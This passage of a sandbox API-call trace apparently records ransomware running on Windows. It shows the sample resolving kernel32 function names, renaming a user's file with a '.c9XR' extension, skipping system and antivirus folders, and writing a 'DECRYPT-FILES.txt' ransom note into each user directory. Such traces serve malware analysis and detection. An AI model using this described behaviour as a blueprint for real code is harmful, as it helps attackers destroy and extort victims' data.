lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0087.901] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0087.901] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0087.901] lstrlenA (lpString="DECODEPOINTER") returned 13 [0087.901] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0087.901] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0087.901] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0087.901] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0087.901] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0087.901] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0087.901] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0087.901] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0087.901] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0087.901] lstrlenA (lpString="DELETEATOM") returned 10 [0087.901] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0087.901] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0087.901] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0087.901] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0087.901] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0087.901] lstrlenA (lpString="DELETEFIBER") returned 11 [0087.901] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0087.901] lstrlenA (lpString="DELETEFILEA") returned 11 [0087.901] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0087.901] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0087.901] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0087.901] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0087.901] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0087.901] lstrlenA (lpString="DELETEFILEW") returned 11 [0087.902] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0087.902] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0087.902] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0087.902] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0087.902] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0087.902] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0087.902] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0087.902] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0087.902] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0087.902] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0087.902] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0087.902] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0087.902] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0087.902] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0087.902] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0087.902] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0087.902] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0087.902] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0087.902] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0087.902] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0087.902] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0087.902] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0087.902] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0087.902] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0087.902] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0087.914] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0087.919] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0087.919] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0087.921] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0087.921] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0087.926] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0087.926] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0087.926] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0087.926] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0087.926] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0087.928] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0087.931] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0087.931] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0087.931] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0087.931] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0087.931] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0087.931] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0087.931] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0087.931] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0087.931] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0087.931] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0087.931] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0087.932] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0087.932] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0087.932] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0087.932] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0087.932] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0087.932] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0087.932] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0087.932] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0087.932] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0087.932] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0087.932] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0087.932] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0087.932] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0087.932] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0087.932] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0087.932] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0087.932] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0087.932] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0087.932] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0087.932] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0087.932] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0087.932] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_EoDt9ig1S-.swf") returned 52 [0087.932] wsprintfW (in: param_1=0x3f2e120, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_EoDt9ig1S-.swf.c9XR") returned 57 [0087.933] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_EoDt9ig1S-.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_eodt9ig1s-.swf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_EoDt9ig1S-.swf.c9XR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_eodt9ig1s-.swf.c9xr"), dwFlags=0x0) returned 1 [0087.933] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.934] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.934] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.934] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe086d690, ftCreationTime.dwHighDateTime=0x1d4c8a1, ftLastAccessTime.dwLowDateTime=0x59e45d10, ftLastAccessTime.dwHighDateTime=0x1d4cca7, ftLastWriteTime.dwLowDateTime=0x59e45d10, ftLastWriteTime.dwHighDateTime=0x1d4cca7, nFileSizeHigh=0x0, nFileSizeLow=0x133ec, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_EoDt9ig1S-.swf", cAlternateFileName="_EODT9~1.SWF")) returned 0 [0087.934] FindClose (in: hFindFile=0x5f8b98 | out: hFindFile=0x5f8b98) returned 1 [0087.934] CloseHandle (hObject=0x430) returned 1 [0087.935] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xae6408a0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xae6408a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Videos\\", cAlternateFileName="")) returned 0 [0087.935] FindClose (in: hFindFile=0x5f8c18 | out: hFindFile=0x5f8c18) returned 1 [0087.935] CloseHandle (hObject=0x420) returned 1 [0087.935] FindNextFileW (in: hFindFile=0x5f8bd8, lpFindFileData=0x3f2f648 | out: lpFindFileData=0x3f2f648*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="All Users", cAlternateFileName="ALLUSE~1")) returned 1 [0087.935] lstrcmpW (lpString1="All Users", lpString2=".") returned 1 [0087.935] lstrcmpW (lpString1="All Users", lpString2="..") returned 1 [0087.935] lstrcatW (in: lpString1="All Users", lpString2="\\" | out: lpString1="All Users\\") returned="All Users\\" [0087.935] lstrcatW (in: lpString1="C:\\Users\\", lpString2="All Users\\" | out: lpString1="C:\\Users\\All Users\\") returned="C:\\Users\\All Users\\" [0087.935] StrStrW (lpFirst="C:\\Users\\All Users\\", lpSrch="\\Program Files") returned 0x0 [0087.935] StrStrW (lpFirst="C:\\Users\\All Users\\", lpSrch=":\\Windows") returned 0x0 [0087.935] StrStrW (lpFirst="C:\\Users\\All Users\\", lpSrch="\\Games\\") returned 0x0 [0087.935] StrStrW (lpFirst="C:\\Users\\All Users\\", lpSrch="\\Tor Browser\\") returned 0x0 [0087.936] StrStrW (lpFirst="C:\\Users\\All Users\\", lpSrch="\\ProgramData\\") returned 0x0 [0087.936] StrStrW (lpFirst="C:\\Users\\All Users\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0087.936] StrStrW (lpFirst="C:\\Users\\All Users\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0087.936] StrStrW (lpFirst="C:\\Users\\All Users\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0087.936] StrStrW (lpFirst="C:\\Users\\All Users\\", lpSrch="\\All Users") returned="\\All Users\\" [0087.936] FindNextFileW (in: hFindFile=0x5f8bd8, lpFindFileData=0x3f2f648 | out: lpFindFileData=0x3f2f648*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6c42120, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa6c42120, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6c42120, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0087.936] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0087.936] FindNextFileW (in: hFindFile=0x5f8bd8, lpFindFileData=0x3f2f648 | out: lpFindFileData=0x3f2f648*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x62fa4a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x62fa4a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="Default", cAlternateFileName="")) returned 1 [0087.936] lstrcmpW (lpString1="Default", lpString2=".") returned 1 [0087.936] lstrcmpW (lpString1="Default", lpString2="..") returned 1 [0087.936] lstrcatW (in: lpString1="Default", lpString2="\\" | out: lpString1="Default\\") returned="Default\\" [0087.936] lstrcatW (in: lpString1="C:\\Users\\", lpString2="Default\\" | out: lpString1="C:\\Users\\Default\\") returned="C:\\Users\\Default\\" [0087.936] StrStrW (lpFirst="C:\\Users\\Default\\", lpSrch="\\Program Files") returned 0x0 [0087.936] StrStrW (lpFirst="C:\\Users\\Default\\", lpSrch=":\\Windows") returned 0x0 [0087.936] StrStrW (lpFirst="C:\\Users\\Default\\", lpSrch="\\Games\\") returned 0x0 [0087.936] StrStrW (lpFirst="C:\\Users\\Default\\", lpSrch="\\Tor Browser\\") returned 0x0 [0087.936] StrStrW (lpFirst="C:\\Users\\Default\\", lpSrch="\\ProgramData\\") returned 0x0 [0087.936] StrStrW (lpFirst="C:\\Users\\Default\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0087.936] StrStrW (lpFirst="C:\\Users\\Default\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0087.936] StrStrW (lpFirst="C:\\Users\\Default\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0087.936] StrStrW (lpFirst="C:\\Users\\Default\\", lpSrch="\\All Users") returned 0x0 [0087.936] StrStrW (lpFirst="C:\\Users\\Default\\", lpSrch="\\IETldCache\\") returned 0x0 [0087.936] StrStrW (lpFirst="C:\\Users\\Default\\", lpSrch="\\Local Settings\\") returned 0x0 [0087.936] StrStrW (lpFirst="C:\\Users\\Default\\", lpSrch="\\AppData\\Local") returned 0x0 [0087.936] StrStrW (lpFirst="C:\\Users\\Default\\", lpSrch="AhnLab") returned 0x0 [0087.936] StrStrW (lpFirst="C:\\Users\\Default\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0087.936] lstrlenW (lpString="C:\\Users\\Default\\") returned 17 [0087.936] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0087.936] wsprintfW (in: param_1=0x3f2ebac, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\\\jkbimi8.tmp") returned 29 [0087.936] CreateFileW (lpFileName="C:\\Users\\Default\\\\jkbimi8.tmp" (normalized: "c:\\users\\default\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x420 [0087.937] lstrlenW (lpString="C:\\Users\\Default\\") returned 17 [0087.937] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0087.937] wsprintfW (in: param_1=0x3f2ebac, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\\\DECRYPT-FILES.txt") returned 35 [0087.937] CreateFileW (lpFileName="C:\\Users\\Default\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x424 [0087.937] WriteFile (in: hFile=0x424, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2eba8, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2eba8*=0x23fc, lpOverlapped=0x0) returned 1 [0087.938] CloseHandle (hObject=0x424) returned 1 [0087.939] lstrlenW (lpString="C:\\Users\\Default\\") returned 17 [0087.939] lstrcatW (in: lpString1="C:\\Users\\Default\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\*") returned="C:\\Users\\Default\\*" [0087.939] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\*", lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb09cf140, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb09cf140, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8c18 [0087.939] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0087.939] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb09cf140, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb09cf140, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0087.939] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0087.939] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0087.939] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 1 [0087.939] lstrcmpW (lpString1="AppData", lpString2=".") returned 1 [0087.939] lstrcmpW (lpString1="AppData", lpString2="..") returned 1 [0087.939] lstrcatW (in: lpString1="AppData", lpString2="\\" | out: lpString1="AppData\\") returned="AppData\\" [0087.939] lstrcatW (in: lpString1="C:\\Users\\Default\\", lpString2="AppData\\" | out: lpString1="C:\\Users\\Default\\AppData\\") returned="C:\\Users\\Default\\AppData\\" [0087.939] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\", lpSrch="\\Program Files") returned 0x0 [0087.939] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\", lpSrch=":\\Windows") returned 0x0 [0087.939] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\", lpSrch="\\Games\\") returned 0x0 [0087.939] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\", lpSrch="\\Tor Browser\\") returned 0x0 [0087.939] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\", lpSrch="\\ProgramData\\") returned 0x0 [0087.939] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0087.939] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0087.939] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0087.939] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\", lpSrch="\\All Users") returned 0x0 [0087.939] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\", lpSrch="\\IETldCache\\") returned 0x0 [0087.939] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\", lpSrch="\\Local Settings\\") returned 0x0 [0087.939] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\", lpSrch="\\AppData\\Local") returned 0x0 [0087.939] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\", lpSrch="AhnLab") returned 0x0 [0087.939] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0087.939] lstrlenW (lpString="C:\\Users\\Default\\AppData\\") returned 25 [0087.939] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0087.940] wsprintfW (in: param_1=0x3f2e930, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\AppData\\\\jkbimi8.tmp") returned 37 [0087.940] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\\\jkbimi8.tmp" (normalized: "c:\\users\\default\\appdata\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x430 [0087.940] lstrlenW (lpString="C:\\Users\\Default\\AppData\\") returned 25 [0087.940] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0087.940] wsprintfW (in: param_1=0x3f2e930, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\AppData\\\\DECRYPT-FILES.txt") returned 43 [0087.940] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\appdata\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0087.940] WriteFile (in: hFile=0x434, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2e92c, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2e92c*=0x23fc, lpOverlapped=0x0) returned 1 [0087.941] CloseHandle (hObject=0x434) returned 1 [0087.941] lstrlenW (lpString="C:\\Users\\Default\\AppData\\") returned 25 [0087.941] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\AppData\\*") returned="C:\\Users\\Default\\AppData\\*" [0087.941] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\*", lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb09cf140, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb09cf140, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8b98 [0087.942] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0087.942] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb09cf140, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb09cf140, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0087.942] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0087.942] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0087.942] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb09cf140, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb09cf140, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb09cf140, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0087.942] lstrcmpiW 